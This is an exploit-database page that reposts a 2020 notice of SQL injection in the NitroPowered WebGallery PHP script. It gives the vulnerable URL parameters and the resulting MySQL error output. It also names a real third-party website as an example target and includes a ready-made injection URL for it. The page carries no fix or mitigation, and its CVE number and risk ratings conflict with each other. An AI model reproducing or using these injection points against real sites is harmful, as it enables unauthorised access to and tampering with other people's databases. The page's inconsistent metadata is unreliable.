Advertisement






NitroPowered WebGallery SQL Injection

CVE Category Price Severity
CVE-2015-7286 CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2020-01-23
CPE
cpe:cpe:/a:nitropowered:webgallery
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020010176

Below is a copy:

NitroPowered WebGallery SQL Injection
###################################################################

# Exploit Title : NitroPowered WebGallery SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 23/01/2020
# Vendor Homepage : nitropowered.de
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
NitroPowered is prone to an SQL-injection vulnerability because 
it fails to sufficiently sanitize user-supplied data before using it in an SQL query. 
Exploiting this issue could allow an attacker to compromise the application, access or 
modify data, or exploit latent vulnerabilities in the underlying database. 
A remote attacker can send a specially crafted request to the vulnerable application and 
execute arbitrary SQL commands in application`s database. Further exploitation of this 
vulnerability may result in unauthorized data manipulation. 
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

###################################################################

# SQL Injection Exploit :
**********************
/gallery/index.php?section=pictures&action=open&PictureId=&Position=[SQL Injection]

/gallery/index.php?section=pictures&action=open&PictureId=&Position=[SQL Injection]&order=PictureName&direction=ASC

###################################################################

# Example Vulnerable Sites :
*************************
(C) This site is NITROpowered!

[+] c-paulsen.de/gallery/index.php?section=pictures&action=open&PictureId=&Position=1%27&order=PictureName&direction=ASC

###################################################################

# Example SQL Database Error :
****************************
Database Error:
1064 - SELECT ga.Access FROM tblGroupsAccess ga, tblAlbums a, tblPictures p,
 tblPicsAssign pa WHERE pa.PictureId = AND pa.AlbumId = a.AlbumId AND a.CatId 
= ga.CatId AND ga.GroupId = 3 AND ga.Access = 1You have an error in your SQL 
syntax; check the manual that corresponds to your MySQL server version for the right 
syntax to use near 'AND pa.AlbumId = a.AlbumId AND a.CatId = ga.CatId AND
 ga.GroupId = 3 AND ga.Acce' at line 1

###################################################################

# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum